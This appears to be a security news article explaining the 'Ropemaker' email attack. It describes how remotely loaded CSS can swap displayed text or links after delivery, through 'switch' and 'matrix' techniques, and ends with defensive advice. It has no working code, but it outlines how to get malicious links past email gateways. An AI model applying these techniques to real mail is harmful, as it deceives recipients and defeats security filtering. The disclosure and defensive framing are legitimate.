Researchers from Mimecast, a security company based in the U.K., have uncovered an exploitable vector for launching email attacks.
This email exploit is based on the dependence of HTML-emails on CSS for design and on the ability to load remote CSS scripts for the email.
Such a situation opens up a few security holes for hackers, as we shall see.
Cascading Style Sheets
The Hyper-Text Markup Language, more commonly known as HTML, is basically designed for structuring information, which in turn leaves the final display often looking tasteless.
To create a more appealing presentation of web pages and other HTML-dependent technologies like HTML-email, Cascading Style Sheets (or CSS) code is used.
It is this remote loading that makes Ropemaker possible.
The Email Exploit
Ropemaker was discovered by Francisco Ribeiro from Mimecast.
The “Ropemaker” acronym stands for “Remotely Originated Post-delivery Email Manipulation Attacks Keeping Email Risky.”
It is dependent on the email client being allowed to load a CSS file from a remote location, in order to properly display a HTML-email.
The applications of Ropemaker, as is the case with most other exploits, are limited only by the imagination of the hacker.
By simply changing the CSS code under the attacker’s control, the destination URL contained in the email could be changed from a safe address to a malicious one.
A blank or even simple “How are you?” message could be changed into an entirely different message.
A “Yes” could be changed into a “No,” which can have important business consequences, or even a $10 changed into $10,000.
Web-Based Mail Remains Safe
According to the researchers, web-based email services like Gmail, iCloud and Outlook Web Access are all immune to a Ropemaker attack.
Mobile and desktop email clients like Microsoft Outlook, Apple Mail and Mozilla Thunderbird, on the other hand, could all fall victim.
The research team also tested an Android email client, which was immune to the attack.
However, they noted that Android clients could not be classified as safe, because of the numerous Android versions in the market.
The Anatomy of a Ropemaker Attack
The researchers highlighted two different types of a Ropemaker attack, as well as the possibility of other related attacks.
They are as follows:
- Attack 1: The Switch Exploit
This method is based on having more than one version of a message, or part of a message, and then using CSS to control which version is displayed.Each version can be contained in a <div> with a unique id.The version to be displayed is then assigned the CSS ‘display: inline;’ directive, while the other version(s) is hidden with ‘display:none;’.
This is the simplest type of a Ropemaker attack.Any malicious link in such an email can, of course, be detected by most security checks, but hackers could still use this exploit effectively in an attack.
- Attack 2: The Matrix exploit
The second type of attack is more sophisticated than the first. With this matrix exploit, a matrix of ASCII text, containing all the single characters of the alphabet, is sent as part of the email.The attacker then uses CSS to remotely control which individual characters to form a sentence with.This second type of attack is much more difficult for email gateways to detect and offers hackers the opportunity to display URLs to any web address.Well-known malicious links with payloads, can be emailed this way, and completely without detection.
- Other Possible AttacksThe “Man in the Middle Attack” is simply a scenario where an attacker gains a middle-man access to the email client’s CSS request.While the remote host could be completely safe in this situation, the middle-man attacker can easily inject his own code into the CSS file.External SVGs could also be used with links and text, to create URLs or display other content to the email user.
HTML tags like <iframe> and <embed> could also be injected in order to introduce new documents, or even applications.
In Conclusion: Protecting Yourself
Ropemaker may be a new discovery, but it is based on an age-old computer security problem—the potential dangers of relying on remote scripts.
Both Microsoft and Apple did not consider it a threat, as they stated in their email responses to Mimecraft, so users are left on their own.
Disabling the loading of remote content will protect any email client, as well as disabling HTML-email completely, or the sole use of web-based email services like Gmail.